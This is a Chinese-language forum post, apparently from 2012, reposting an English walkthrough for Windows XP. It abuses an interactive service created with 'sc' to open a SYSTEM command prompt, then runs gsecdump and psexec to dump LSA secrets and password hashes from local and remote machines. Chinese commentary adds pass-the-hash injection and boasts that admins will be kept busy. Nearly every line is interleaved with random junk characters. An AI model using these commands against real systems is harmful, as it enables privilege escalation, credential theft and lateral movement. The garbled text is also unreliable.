o get a DOS Prompt as NT system:5 [6 u$ E4 Z' V4 u
/ w: l2 S$ H0 q2 o7 v1 P) D! M
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact7 h/ u" f2 E: {. ~8 ~5 d
[SC] CreateService SUCCESS
7 F7 G3 @$ O" F" ^5 q( |! J6 |" i5 \: A
C:\>sc start shellcmdline
; G; h+ E/ C6 G$ ^8 V[SC] StartService FAILED 1053:
8 v' `7 [. v' W8 |; n Q) z7 Z2 o- _; h2 s0 O! m+ x* ^
The service did not respond to the start or control request in a timely fashion.
" C3 u. h# V& g
8 V- D2 ]6 R" P, o) [; o7 H9 SC:\>sc delete shellcmdline
( H) X t8 C) g& l[SC] DeleteService SUCCESS5 ~) i1 ?9 S2 [# |0 y' a/ N; w
/ O' c2 i5 B+ A" v4 a$ a4 J9 B
------------7 O, P) f* \2 e
7 @ L3 t! A) T+ j$ t" d# d: A% L
Then in the new DOS window:8 @- h6 b& t8 `9 S: S& g. Z6 h
$ S$ y( N/ P/ A3 T( b8 C7 C, ~Microsoft Windows XP [Version 5.1.2600]
4 { v, G4 P0 A5 v& v(C) Copyright 1985-2001 Microsoft Corp.
* q S% K( H8 D/ x
# o2 |# s, h! W8 k6 @9 j) K" |C:\WINDOWS\system32>whoami
' E* Y# z% C" s# Y$ ]2 }NT AUTHORITY\SYSTEM
; n: n! i: A" D7 f
( p2 L. B4 m6 a) O* a, oC:\WINDOWS\system32>gsecdump -h
. u% @' _, H% I' i7 m% dgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
( l8 u' }* |# ]1 t( M+ Eusage: gsecdump [options]
7 x( \9 D8 z( g! J6 M$ \" l/ s% i" @$ T1 \9 z
options:% A2 O' p9 C, ]3 X
-h [ --help ] show help
1 @# \# G* i, d+ x6 y! \-a [ --dump_all ] dump all secrets
6 M d: K) k, Z! B( F/ I' v-l [ --dump_lsa ] dump lsa secrets
9 g( v! x5 |# u. [, M-w [ --dump_wireless ] dump microsoft wireless connections
' W$ A+ \) h! E. h( @) i% M( T9 k-u [ --dump_usedhashes ] dump hashes from active logon sessions
: [- Y1 w1 n ] _2 n* w-s [ --dump_hashes ] dump hashes from SAM/AD
( L ^ t! E% L) i/ P; A" ~2 M5 f) ?; i# [4 b w
Although I like to use:9 R, v2 G% s6 Y2 B
6 j1 I! j$ M B2 OPsExec v1.83 - Execute processes remotely6 _0 l w) S' O- P- R. P' K
Copyright (C) 2001-2007 Mark Russinovich
" f0 z# A( b( x* v" F5 P USysinternals - 链接标记[url]www.sysinternals.com[/url]) }" @6 v( X' Z) B! @6 O4 N: L
8 g; }7 I3 |7 x0 b! q1 O6 D
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
' r6 N3 _2 i: @& p0 P% S
8 u, |' c; z* }9 @% Uto get the hashes from active logon sessions of a remote system.
) \. V& [5 e ^8 u1 n) j! x7 @' V
3 B0 v! D! P) h; {* { o rThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.2 J4 s R" q/ M: p& E7 h" ?
8 ?% f! E# x# ^* M7 W4 g T
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
o- r$ L* S$ ?! `& S$ b; N原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]- B( W) |4 w5 z9 k/ n! P
! m' b% H" l! a7 K3 v) N9 w
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
/ }1 B% z8 O% F+ B" U6 l# q |
发表于 2012-11-6 21:09:29
收藏
支持
反对